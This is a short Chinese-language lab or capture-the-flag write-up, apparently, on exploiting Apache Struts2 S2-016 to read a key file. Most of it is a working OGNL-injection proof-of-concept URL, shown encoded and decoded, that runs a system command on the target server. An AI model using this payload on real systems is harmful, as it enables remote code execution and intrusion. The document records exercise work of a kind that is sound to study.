使用工具检测s2-016漏洞,发现存在漏洞;
命令执行,发现key.txt;
查看文件,得到key;
poc:
http://219.153.49.228:48008/index.action?redirect%3A%24%7B%23a%3d%28new java.lang.ProcessBuilder%28new java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew java.io.InputStreamReader%28%23b%29,%23d%3dnew java.io.BufferedReader%28%23c%29,%23e%3dnew char%5B50000%5D,%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
http://219.153.49.228:48008/index.action?redirect:
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
#matt.getWriter().println(#e),
#matt.getWriter().flush(),
#matt.getWriter().close()
}
漏洞详情: